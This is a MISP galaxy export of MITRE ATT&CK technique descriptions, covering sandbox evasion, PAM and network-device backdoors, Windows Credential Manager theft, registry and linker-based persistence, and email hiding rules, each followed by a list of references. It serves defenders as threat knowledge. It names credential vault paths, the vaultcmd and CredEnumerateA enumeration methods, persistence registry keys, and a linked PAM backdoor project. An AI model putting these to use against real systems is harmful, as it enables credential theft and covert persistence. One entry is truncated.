https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

Time Based Evasion - T1497.003

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)

Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)

Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment’s timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)

The tag is: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003"

Table 3442. Table References
Links
https://attack.mitre.org/techniques/T1497/003
https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
https://www.joesecurity.org/blog/3660886847485093803
https://www.joesecurity.org/blog/498839998833561473
https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes

Application Exhaustion Flood - T1499.003

Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. (Citation: Arbor AnnualDoSreport Jan 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Application Exhaustion Flood - T1499.003"

Table 3443. Table References
Links
https://attack.mitre.org/techniques/T1499/003
https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

Pluggable Authentication Modules - T1556.003

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)

The tag is: misp-galaxy:mitre-attack-pattern="Pluggable Authentication Modules - T1556.003"

Table 3444. Table References
Links
https://attack.mitre.org/techniques/T1556/003
https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
https://linux.die.net/man/8/pam_unix
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
https://github.com/zephrax/linux-pam-backdoor
https://x-c3ll.github.io/posts/PAM-backdoor-DNS/

Runtime Data Manipulation - T1565.003

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003"

Table 3445. Table References
Links
https://attack.mitre.org/techniques/T1565/003
https://content.fireeye.com/apt/rpt-apt38
https://www.justice.gov/opa/press-release/file/1092091/download

Spearphishing via Service - T1566.003

Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that’s running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it’s something they were expecting. If the payload doesn’t work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003"

Table 3446. Table References
Links
https://attack.mitre.org/techniques/T1566/003
https://capec.mitre.org/data/definitions/163.html

Delete Cloud Instance - T1578.003

An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.

An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Delete Cloud Instance - T1578.003"

Table 3447. Table References
Links
https://attack.mitre.org/techniques/T1578/003
https://content.fireeye.com/m-trends/rpt-m-trends-2020
https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
https://cloud.google.com/logging/docs/audit#admin-activity

Code Signing Certificates - T1588.003

Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don’t know who issued the certificate or who the author is.

Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Certificates - T1588.003"

Table 3448. Table References
Links
https://attack.mitre.org/techniques/T1588/003
https://en.wikipedia.org/wiki/Code_signing

NTFS File Attributes - T1564.004

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)

Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004"

Table 3449. Table References
Links
https://attack.mitre.org/techniques/T1564/004
https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea
https://blogs.technet.microsoft.com/askcore/2010/08/25/ntfs-file-attributes/
http://msdn.microsoft.com/en-us/library/aa364404
https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/
https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
http://journeyintoir.blogspot.com/2012/12/extracting-zeroaccess-from-ntfs.html
https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
https://www.symantec.com/connect/articles/what-you-need-know-about-alternate-data-streams-windows-your-data-secure-can-you-restore

Winlogon Helper DLL - T1547.004

Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)

Winlogon\Notify - points to notification package DLLs that handle Winlogon events
Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1547.004"

Table 3450. Table References
Links
https://attack.mitre.org/techniques/T1547/004
https://capec.mitre.org/data/definitions/579.html
https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
https://technet.microsoft.com/en-us/sysinternals/bb963902

Windows Credential Manager - T1555.004

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of [Credentials from Web Browsers](https://attack.mitre.org/techniques/T1555/003), Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted <code>.vcrd</code> files, located under <code>%Systemdrive%\Users\\[Username]\AppData\Local\Microsoft\\[Vault/Credentials]\</code>. The encryption key can be found in a file named <code>Policy.vpol</code>, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. <code>vaultcmd.exe</code> is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as <code>CredEnumerateA</code> to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)

Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)

The tag is: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004"

Table 3451. Table References
Links
https://attack.mitre.org/techniques/T1555/004
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v=ws.11)#credential-manager-store
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-8.1-and-8/jj554668(v=ws.11)?redirectedfrom=MSDN
https://www.passcape.com/windows_password_recovery_vault_explorer
https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ [https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/ ]
https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-credenumeratea
https://github.com/gentilkiwi/mimikatz/wiki/howto-_{-credential-manager-saved-credentials[https://github.com/gentilkiwi/mimikatz/wiki/howto-}-credential-manager-saved-credentials]

Network Device Authentication - T1556.004

Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.

[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.(Citation: FireEye - Synful Knock)

The tag is: misp-galaxy:mitre-attack-pattern="Network Device Authentication - T1556.004"

Table 3452. Table References
Links
https://attack.mitre.org/techniques/T1556/004
https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-acis.html[https://www.fireeye.com/blog/threat-research/2015/09/synful_knock-_acis.html]
https://tools.cisco.com/security/center/resources/integrity_assurance.html#7
https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

Hidden File System - T1564.005

Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)

Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005"

Table 3453. Table References
Links
https://attack.mitre.org/techniques/T1564/005
https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html
https://www.fireeye.com/blog/threat-research/2015/12/fin1-targets-boot-record.html
https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf

Security Support Provider - T1547.005

Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs.

The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)

The tag is: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005"

Table 3454. Table References
Links
https://attack.mitre.org/techniques/T1547/005
http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
https://technet.microsoft.com/en-us/library/dn408187.aspx

Run Virtual Instance - T1564.006

Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)

Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006"

Table 3455. Table References
Links
https://attack.mitre.org/techniques/T1564/006
https://www.mci.gov.sg/-/media/mcicorp/doc/report-of-the-coi-into-the-cyber-attack-on-singhealth-10-jan-2019.ashx
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/

Netsh Helper DLL - T1546.007

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.

Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)

The tag is: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007"

Table 3456. Table References
Links
https://attack.mitre.org/techniques/T1546/007
https://technet.microsoft.com/library/bb490939.aspx
https://github.com/outflankbv/NetshHelperBeacon
https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html

Dynamic Linker Hijacking - T1574.006

Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process’s memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary’s malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers)

On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the <code>DYLD_INSERT_LIBRARIES</code> environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006"

Table 3457. Table References
Links
https://attack.mitre.org/techniques/T1574/006
https://capec.mitre.org/data/definitions/13.html
https://capec.mitre.org/data/definitions/640.html
https://www.man7.org/linux/man-pages/man8/ld.so.8.html
https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html
https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html
https://www.baeldung.com/linux/ld_preload-trick-what-is
https://www.datawire.io/code-injection-on-linux-and-macos/
http://hick.org/code/skape/papers/needle.txt
http://phrack.org/issues/51/8.html
http://www.nth-dimension.org.uk/pub/BTL.pdf
https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/
https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/
https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191

Email Hiding Rules - T1564.008

Adversaries may use email rules to hide inbound emails in a compromised user’s mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

Adversaries may utilize email rules within a compromised user’s mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.

Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)

The tag is: misp-galaxy:mitre-attack-pattern="Email Hiding Rules - T1564.008"

Table 3458. Table References
Links
https://attack.mitre.org/techniques/T1564/008
https://support.microsoft.com/en-us/office/manage-email-messages-by-using-rules-c24f5dea-9465-4df4-ad17-a50704d66c59
https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac
https://docs.microsoft.com/en-us/powershell/module/exchange/new-inboxrule?view=exchange-ps
https://docs.microsoft.com/en-us/powershell/module/exchange/set-inboxrule?view=exchange-ps
https://techcommunity.microsoft.com/t5/security-compliance-and-identity/rule-your-inbox-with-microsoft-cloud-app-security/ba-p/299154
https://www.microsoft.com/security/blog/2021/06/14/behind-the-scenes-of-business-email-compromise-using-cross-domain-threat-data-to-disrupt-a-large-bec-infrastructure/

Revert Cloud Instance - T1578.004

Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)

The tag is: misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1578.004"

Table 3459. Table References
Links
https://attack.mitre.org/techniques/T1578/004
https://www.techrepublic.com/blog/the-enterprise-cloud/backing-up-and-restoring-snapshots-on-amazon-ec2-machines/
https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots

XDG Autostart Entries - T1547.013

Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the <code>/etc/xdg/autostart</code> or <code>~/.config/autostart</code> directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)

Within an XDG autostart entry file, the <code>Type</code> key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The <code>Name</code> key indicates an arbitrary name assigned by the creator and the <code>Exec</code> key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)

Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013"

Table 3460. Table References
Links
https://attack.mitre.org/techniques/T1547/013
https://specifications.freedesktop.org/autostart-spec/autostart-spec-latest.html
https://specifications.freedesktop.org/desktop-entry-spec/1.2/ar01s06.html

Identify business processes/tempo - T1280

Understanding an organizations business processes and tempo may allow an adversary to more effectively craft social engineering attempts or to better hide technical actions, such as those that generate network traffic. (Citation: Scasny2015) (Citation: Infosec-osint)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business processes/tempo - T1280"

Table 3461. Table References
Links
https://attack.mitre.org/techniques/T1280

System Owner/User Discovery - T1033

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

The tag is: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033"

Table 3462. Table References
Links
https://attack.mitre.org/techniques/T1033
https://capec.mitre.org/data/definitions/577.html

Disguise Root/Jailbreak Indicators - T1408

An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).

The tag is: misp-galaxy:mitre-attack-pattern="Disguise Root/Jailbreak Indicators - T1408"

Table 3463. Table References
Links
https://attack.mitre.org/techniques/T1408
https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html
https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf
http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions
http://pages.cs.wisc.edu/_{vrastogi/static/papers/rcj13b.pdf[http://pages.cs.wisc.edu/}vrastogi/static/papers/rcj13b.pdf]

Obtain templates/branding materials - T1281

Templates and branding materials may be used by an adversary to add authenticity to social engineering message. (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain templates/branding materials - T1281"

Table 3464. Table References
Links
https://attack.mitre.org/techniques/T1281

Research relevant vulnerabilities/CVEs - T1291

Common Vulnerability Enumeration (CVE) is a dictionary of publicly known information about security vulnerabilities and exposures. An adversary can use this information to target specific software that may be vulnerable. (Citation: WeaponsVulnerable) (Citation: KasperskyCarbanak)

The tag is: misp-galaxy:mitre-attack-pattern="Research relevant vulnerabilities/CVEs - T1291"

Table 3465. Table References
Links
https://attack.mitre.org/techniques/T1291
https://securelist.com/the-great-bank-robbery-the-carbanak-apt/68732/

Conduct cost/benefit analysis - T1226

Leadership conducts a cost/benefit analysis that generates a compelling need for information gathering which triggers a Key Intelligence Toptic (KIT) or Key Intelligence Question (KIQ). For example, an adversary compares the cost of cyber intrusions with the expected benefits from increased intelligence collection on cyber adversaries. (Citation: LowenthalCh4) (Citation: KIT-Herring)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct cost/benefit analysis - T1226"

Table 3466. Table References
Links
https://attack.mitre.org/techniques/T1226

Assess KITs/KIQs benefits - T1229

Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) may be further subdivided to focus on political, economic, diplomatic, military, financial, or intellectual property categories. An adversary may specify KITs or KIQs in this manner in order to understand how the information they are pursuing can have multiple uses and to consider all aspects of the types of information they need to target for a particular purpose. (Citation: CompetitiveIntelligence) (Citation: CompetitiveIntelligence)KIT.

The tag is: misp-galaxy:mitre-attack-pattern="Assess KITs/KIQs benefits - T1229"

Table 3467. Table References
Links
https://attack.mitre.org/techniques/T1229

Determine approach/attack vector - T1245

The approach or attack vector outlines the specifics behind how the adversary would like to attack the target. As additional information is known through the other phases of PRE-ATT&CK, an adversary may update the approach or attack vector. (Citation: CyberAdversaryBehavior) (Citation: WITCHCOVEN2015) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine approach/attack vector - T1245"

Table 3468. Table References
Links
https://attack.mitre.org/techniques/T1245

Mine technical blogs/forums - T1257

Technical blogs and forums provide a way for technical staff to ask for assistance or troubleshoot problems. In doing so they may reveal information such as operating system (OS), network devices, or applications in use. (Citation: FunAndSun2012)

The tag is: misp-galaxy:mitre-attack-pattern="Mine technical blogs/forums - T1257"

Table 3469. Table References
Links
https://attack.mitre.org/techniques/T1257

